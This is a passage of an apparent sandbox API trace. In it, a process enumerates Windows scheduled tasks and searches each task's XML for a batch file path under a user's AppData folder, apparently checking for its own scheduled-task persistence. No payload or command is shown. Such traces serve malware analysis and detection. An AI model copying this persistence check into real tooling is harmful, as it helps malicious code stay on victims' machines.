0x0 [0162.478] IUnknown:Release (This=0x9295f0) returned 0x0 [0162.478] IUnknown:Release (This=0x929470) returned 0x0 [0162.478] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.479] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.479] IUnknown:Release (This=0x929470) returned 0x0 [0162.479] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.479] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.479] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.479] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0162.479] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295d0) returned 0x0 [0162.479] IRegisteredTask:get_Name (in: This=0x9295d0, pName=0xce058 | out: pName=0xce058*="Tpm-HASCertRetr") returned 0x0 [0162.479] IRegisteredTask:get_Xml (in: This=0x9295d0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2015-02-16T17:49:20.8844064\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-605)\r\n \\Microsoft\\Windows\\TPM\\Tpm-HASCertRetr\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA3250F9541\r\n \r\n \r\n \r\n \r\n {5014B7C8-934E-4262-9816-887FA745A6C4}\r\n \r\n \r\n \r\n") returned 0x0 [0162.480] StrStrIW (lpFirst="\r\n\r\n \r\n 2015-02-16T17:49:20.8844064\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-605)\r\n \\Microsoft\\Windows\\TPM\\Tpm-HASCertRetr\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA3250F9541\r\n \r\n \r\n \r\n \r\n {5014B7C8-934E-4262-9816-887FA745A6C4}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.480] IUnknown:Release (This=0x9295d0) returned 0x0 [0162.480] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295d0) returned 0x0 [0162.480] IRegisteredTask:get_Name (in: This=0x9295d0, pName=0xce058 | out: pName=0xce058*="Tpm-Maintenance") returned 0x0 [0162.480] IRegisteredTask:get_Xml (in: This=0x9295d0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2010-06-10T17:49:20.8844064\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-1469317444-2401623638-2778953283-1691679301-3481717153)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-602)\r\n \\Microsoft\\Windows\\TPM\\Tpm-Maintenance\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7518BCA3391E8B41\r\n \r\n \r\n 7508BCA32A1E890D\r\n \r\n \r\n 750CBCA3290B9641\r\n \r\n \r\n 7510BCA3391E8B41\r\n \r\n \r\n \r\n \r\n {5014B7C8-934E-4262-9816-887FA745A6C4}\r\n \r\n \r\n \r\n") returned 0x0 [0162.481] StrStrIW (lpFirst="\r\n\r\n \r\n 2010-06-10T17:49:20.8844064\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-1469317444-2401623638-2778953283-1691679301-3481717153)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\TpmTasks.dll,-602)\r\n \\Microsoft\\Windows\\TPM\\Tpm-Maintenance\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7518BCA3391E8B41\r\n \r\n \r\n 7508BCA32A1E890D\r\n \r\n \r\n 750CBCA3290B9641\r\n \r\n \r\n 7510BCA3391E8B41\r\n \r\n \r\n \r\n \r\n {5014B7C8-934E-4262-9816-887FA745A6C4}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.481] IUnknown:Release (This=0x9295d0) returned 0x0 [0162.481] IUnknown:Release (This=0x929460) returned 0x0 [0162.481] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.481] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.481] IUnknown:Release (This=0x929460) returned 0x0 [0162.481] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.481] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x43, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.481] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929480) returned 0x0 [0162.482] IRegisteredTaskCollection:get_Count (in: This=0x929480, pCount=0xce048 | out: pCount=0xce048*=7) returned 0x0 [0162.482] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929610) returned 0x0 [0162.482] IRegisteredTask:get_Name (in: This=0x929610, pName=0xce058 | out: pName=0xce058*="Maintenance Install") returned 0x0 [0162.482] IRegisteredTask:get_Xml (in: This=0x929610, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n \\Microsoft\\Windows\\UpdateOrchestrator\\Maintenance Install\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n \r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\usoclient.exe\r\n StartInstall\r\n \r\n \r\n") returned 0x0 [0162.483] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\UpdateOrchestrator\\Maintenance Install\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n \r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\usoclient.exe\r\n StartInstall\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.483] IUnknown:Release (This=0x929610) returned 0x0 [0162.483] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929610) returned 0x0 [0162.483] IRegisteredTask:get_Name (in: This=0x929610, pName=0xce058 | out: pName=0xce058*="Policy Install") returned 0x0 [0162.483] IRegisteredTask:get_Xml (in: This=0x929610, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n \\Microsoft\\Windows\\UpdateOrchestrator\\Policy Install\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n \r\n \r\n \r\n 2021-02-11T13:20:59+02:00\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\usoclient.exe\r\n StartInstall\r\n \r\n \r\n") returned 0x0 [0162.484] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\UpdateOrchestrator\\Policy Install\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n \r\n \r\n \r\n 2021-02-11T13:20:59+02:00\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\usoclient.exe\r\n StartInstall\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.484] IUnknown:Release (This=0x929610) returned 0x0 [0162.484] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929610) returned 0x0 [0162.484] IRegisteredTask:get_Name (in: This=0x929610, pName=0xce058 | out: pName=0xce058*="Reboot") returned 0x0 [0162.484] IRegisteredTask:get_Xml (in: This=0x929610, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FA;;;BA)\r\n $(@%systemRoot%\\system32\\usocore.dll,-104)\r\n $(@%systemRoot%\\system32\\usocore.dll,-103)\r\n $(@%systemRoot%\\system32\\usocore.dll,-106)\r\n \\Microsoft\\Windows\\UpdateOrchestrator\\Reboot\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2000-01-01T03:00:00\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\MusNotification.exe\r\n \r\n \r\n") returned 0x0 [0162.485] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FA;;;BA)\r\n $(@%systemRoot%\\system32\\usocore.dll,-104)\r\n $(@%systemRoot%\\system32\\usocore.dll,-103)\r\n $(@%systemRoot%\\system32\\usocore.dll,-106)\r\n \\Microsoft\\Windows\\UpdateOrchestrator\\Reboot\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2000-01-01T03:00:00\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\MusNotification.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.485] IUnknown:Release (This=0x929610) returned 0x0 [0162.485] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x337b, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929610) returned 0x0 [0162.485] IRegisteredTask:get_Name (in: This=0x929610, pName=0xce058 | out: pName=0xce058*="Resume On Boot") returned 0x0 [0162.485] IRegisteredTask:get_Xml (in: This=0x929610, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n \\Microsoft\\Windows\\UpdateOrchestrator\\Resume On Boot\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n \r\n \r\n \r\n PT5M\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\usoclient.exe\r\n ResumeUpdate\r\n \r\n \r\n") returned 0x0 [0162.486] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\UpdateOrchestrator\\Resume On Boot\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n \r\n \r\n \r\n PT5M\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\usoclient.exe\r\n ResumeUpdate\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.486] IUnknown:Release (This=0x929610) returned 0x0 [0162.486] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929610) returned 0x0 [0162.486] IRegisteredTask:get_Name (in: This=0x929610, pName=0xce058 | out: pName=0xce058*="Schedule Scan") returned 0x0 [0162.486] IRegisteredTask:get_Xml (in: This=0x929610, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FA;;;BA)\r\n $(@%systemRoot%\\system32\\usocore.dll,-104)\r\n $(@%systemRoot%\\system32\\usocore.dll,-103)\r\n $(@%systemRoot%\\system32\\usocore.dll,-105)\r\n \\Microsoft\\Windows\\UpdateOrchestrator\\Schedule Scan\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2021-09-23T12:28:57+02:00\r\n \r\n PT22H\r\n \r\n PT4H\r\n \r\n \r\n PT2H\r\n 7524BCA33E06830D\r\n 01\r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[EventID=8202]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\usoclient.exe\r\n StartScan\r\n \r\n \r\n") returned 0x0 [0162.487] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FA;;;BA)\r\n $(@%systemRoot%\\system32\\usocore.dll,-104)\r\n $(@%systemRoot%\\system32\\usocore.dll,-103)\r\n $(@%systemRoot%\\system32\\usocore.dll,-105)\r\n \\Microsoft\\Windows\\UpdateOrchestrator\\Schedule Scan\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2021-09-23T12:28:57+02:00\r\n \r\n PT22H\r\n \r\n PT4H\r\n \r\n \r\n PT2H\r\n 7524BCA33E06830D\r\n 01\r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[EventID=8202]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\usoclient.exe\r\n StartScan\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.487] IUnknown:Release (This=0x929610) returned 0x0 [0162.487] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929610) returned 0x0 [0162.487] IRegisteredTask:get_Name (in: This=0x929610, pName=0xce058 | out: pName=0xce058*="USO_UxBroker_Display") returned 0x0 [0162.487] IRegisteredTask:get_Xml (in: This=0x929610, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n \\Microsoft\\Windows\\UpdateOrchestrator\\USO_UxBroker_Display\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n IgnoreNew\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7510BCA3381D8941\r\n \r\n \r\n \r\n \r\n C:\\windows\\system32\\MusNotification.exe\r\n Display\r\n \r\n \r\n") returned 0x0 [0162.488] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\UpdateOrchestrator\\USO_UxBroker_Display\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n IgnoreNew\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7510BCA3381D8941\r\n \r\n \r\n \r\n \r\n C:\\windows\\system32\\MusNotification.exe\r\n Display\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.488] IUnknown:Release (This=0x929610) returned 0x0 [0162.488] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x7, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929610) returned 0x0 [0162.488] IRegisteredTask:get_Name (in: This=0x929610, pName=0xce058 | out: pName=0xce058*="USO_UxBroker_ReadyToReboot") returned 0x0 [0162.488] IRegisteredTask:get_Xml (in: This=0x929610, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n \\Microsoft\\Windows\\UpdateOrchestrator\\USO_UxBroker_ReadyToReboot\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7520BCA3381D8941\r\n 01\r\n \r\n \r\n \r\n \r\n C:\\windows\\system32\\MusNotification.exe\r\n ReadyToReboot\r\n \r\n \r\n") returned 0x0 [0162.488] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\UpdateOrchestrator\\USO_UxBroker_ReadyToReboot\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7520BCA3381D8941\r\n 01\r\n \r\n \r\n \r\n \r\n C:\\windows\\system32\\MusNotification.exe\r\n ReadyToReboot\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.489] IUnknown:Release (This=0x929610) returned 0x0 [0162.489] IUnknown:Release (This=0x929480) returned 0x0 [0162.489] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929480) returned 0x0 [0162.489] ITaskFolderCollection:get_Count (in: This=0x929480, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.489] IUnknown:Release (This=0x929480) returned 0x0 [0162.489] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.489] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x44, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.489] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.489] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.489] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295d0) returned 0x0 [0162.490] IRegisteredTask:get_Name (in: This=0x9295d0, pName=0xce058 | out: pName=0xce058*="UPnPHostConfig") returned 0x0 [0162.490] IRegisteredTask:get_Xml (in: This=0x9295d0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemroot%\\system32\\upnphost.dll,-215)\r\n $(@%systemroot%\\system32\\upnphost.dll,-216)\r\n \\Microsoft\\Windows\\UPnP\\UPnPHostConfig\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n sc.exe\r\n config upnphost start= auto\r\n \r\n \r\n") returned 0x0 [0162.490] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemroot%\\system32\\upnphost.dll,-215)\r\n $(@%systemroot%\\system32\\upnphost.dll,-216)\r\n \\Microsoft\\Windows\\UPnP\\UPnPHostConfig\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n sc.exe\r\n config upnphost start= auto\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.490] IUnknown:Release (This=0x9295d0) returned 0x0 [0162.490] IUnknown:Release (This=0x929460) returned 0x0 [0162.490] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.490] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.491] IUnknown:Release (This=0x929460) returned 0x0 [0162.491] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.491] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x45, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.491] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929480) returned 0x0 [0162.491] IRegisteredTaskCollection:get_Count (in: This=0x929480, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.491] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929610) returned 0x0 [0162.491] IRegisteredTask:get_Name (in: This=0x929610, pName=0xce058 | out: pName=0xce058*="HiveUploadTask") returned 0x0 [0162.491] IRegisteredTask:get_Xml (in: This=0x929610, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-501)\r\n \\Microsoft\\Windows\\User Profile Service\\HiveUploadTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n false\r\n IgnoreNew\r\n \r\n 3\r\n PT2M\r\n \r\n true\r\n true\r\n true\r\n \r\n PT10M\r\n PT2H\r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2007-08-28T00:00:00\r\n \r\n PT12H\r\n \r\n PT1H\r\n \r\n \r\n \r\n \r\n {BA677074-762C-444B-94C8-8C83F93F6605}\r\n \r\n \r\n") returned 0x0 [0162.492] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-501)\r\n \\Microsoft\\Windows\\User Profile Service\\HiveUploadTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n false\r\n IgnoreNew\r\n \r\n 3\r\n PT2M\r\n \r\n true\r\n true\r\n true\r\n \r\n PT10M\r\n PT2H\r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2007-08-28T00:00:00\r\n \r\n PT12H\r\n \r\n PT1H\r\n \r\n \r\n \r\n \r\n {BA677074-762C-444B-94C8-8C83F93F6605}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.492] IUnknown:Release (This=0x929610) returned 0x0 [0162.492] IUnknown:Release (This=0x929480) returned 0x0 [0162.492] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929480) returned 0x0 [0162.492] ITaskFolderCollection:get_Count (in: This=0x929480, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.492] IUnknown:Release (This=0x929480) returned 0x0 [0162.492] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.492] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x46, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.492] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.493] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.493] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295d0) returned 0x0 [0162.493] IRegisteredTask:get_Name (in: This=0x9295d0, pName=0xce058 | out: pName=0xce058*="WiFiTask") returned 0x0 [0162.493] IRegisteredTask:get_Xml (in: This=0x9295d0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;BU)(A;;FA;;;S-1-5-80-4155767994-3874329934-3800885181-2130851812-726865888)\r\n $(@%SystemRoot%\\system32\\wifitask.exe,-1)\r\n $(@%SystemRoot%\\system32\\wifitask.exe,-2)\r\n \\Microsoft\\Windows\\WCM\\WiFiTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT10M\r\n true\r\n Queue\r\n 6\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7578BCA33A078008\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\WiFiTask.exe\r\n \r\n \r\n") returned 0x0 [0162.493] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;BU)(A;;FA;;;S-1-5-80-4155767994-3874329934-3800885181-2130851812-726865888)\r\n $(@%SystemRoot%\\system32\\wifitask.exe,-1)\r\n $(@%SystemRoot%\\system32\\wifitask.exe,-2)\r\n \\Microsoft\\Windows\\WCM\\WiFiTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT10M\r\n true\r\n Queue\r\n 6\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7578BCA33A078008\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\WiFiTask.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.494] IUnknown:Release (This=0x9295d0) returned 0x0 [0162.494] IUnknown:Release (This=0x929460) returned 0x0 [0162.494] ITaskFolder:GetFolders (in: 